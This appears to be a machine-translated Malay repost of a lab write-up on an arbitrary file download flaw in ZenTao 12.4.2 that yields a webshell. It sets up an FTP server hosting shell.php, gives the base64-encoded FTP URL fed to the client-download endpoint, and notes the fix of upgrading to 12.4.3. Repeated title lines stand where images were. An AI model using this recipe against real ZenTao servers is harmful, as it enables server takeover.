Rumah > Operasi dan penyelenggaraan > Keselamatan > Apakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?

Apakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?

WBOY
Lepaskan: 2023-05-16 15:43:12
ke hadapan
1594 orang telah melayarinya

0x00Pengenalan

ZenTao ialah perisian pengurusan projek R&D sumber terbuka domestik profesional yang mengintegrasikan pengurusan produk dan pengurusan projek, kualiti pengurusan, pengurusan dokumen, pengurusan organisasi dan pengurusan transaksi, merangkumi sepenuhnya proses teras pengurusan projek R&D. Idea pengurusan adalah berdasarkan kaedah pengurusan projek tangkas yang popular di peringkat antarabangsa - Scrum Atas dasar mengikut nilainya dan menggabungkan status semasa penyelidikan dan pembangunan projek domestik, ia mengintegrasikan pelbagai fungsi seperti pengurusan tugas, pengurusan permintaan, pepijat. pengurusan, pengurusan kes penggunaan, dsb., meliputi perisian daripada perancangan hingga ke seluruh kitaran hayat keluaran.

Gambaran Keseluruhan Kerentanan 0x01

Terdapat kerentanan muat turun fail sewenang-wenangnya dalam ZenTao versi 12.4.2 Kerentanan ini disebabkan oleh penapisan longgar dalam kaedah muat turun dalam klien kelas, yang boleh dicapai menggunakan ftp Tujuan memuat turun fail. Dan direktori storan fail yang dimuat turun boleh menghuraikan fail php, menyebabkan getshell.

0x02 versi terjejas

ZenTao ≤ 12.4.2

0x03 pembinaan persekitaran

phpstudy2018 12.4.2 Alamat muat turun rasmi ZenTao:

https://www.zentao.net/dynamic/zentaopms12.4.2-80263.html

3.1. Selepas muat turun selesai, letakkan Just install ia dalam phpstudy

Apakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?

3.2 Semak sambungan Jika ada sambungan yang gagal, buka sahaja sambungan itu.

Apakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?

3.3 Tetapkan maklumat pangkalan data, di sini tetapkan kepada konfigurasi pangkalan data anda sendiri.

Apakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?

3.4. Tetapan dan pemasangan akaun selesai

Apakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?

3.4. Gunakan persekitaran untuk menyediakan dan mendayakan perkhidmatan ftp Dengan mengambil windows2008R2 sebagai contoh, tambah peranan dan tambah ftp

Apakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?

Apakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?

3.5 dalam Perkhidmatan Maklumat Internet Tambah perkhidmatan ftp ke tapak web di bawah.

Apakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?

3.6 Konfigurasikan mengikut situasi anda sendiri, langkah seterusnya ialah

Apakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?

Apakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?

<.>

Apakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?

3.7 Letakkan cangkerang web dalam direktori ftp dan semak dengan penyemak imbas sama ada ftp boleh diakses secara normal

Apakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?

0x04. pengulangan kerentanan

1 Mula-mula tambah laluan ftp ke shell dan lakukan pengekodan base64

Sebelum penyulitan: ftp://192.168.3.200/shell.php

Selepas penyulitan: ZnRwJTNBLy8xOTIuMTY4LjMuMjAwL3NoZWxsLnBocA==

2 Gunakan EXP dan masukkan base64 yang disulitkan ke dalam php /client-download-1--1.html

Apakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?

3 laluan untuk menguji Adakah shell telah dimuat turun ke pelayan >0x05 kaedah pembaikanApakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?

1 Naik taraf kepada ZenTao 12.4.3 dan versi yang lebih baru

Atas ialah kandungan terperinci Apakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Label berkaitan:
sumber:yisu.com
Kenyataan Laman Web ini
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn
Tutorial Popular
Lagi>
Muat turun terkini
Lagi>
kesan web
Kod sumber laman web
Bahan laman web
Templat hujung hadapan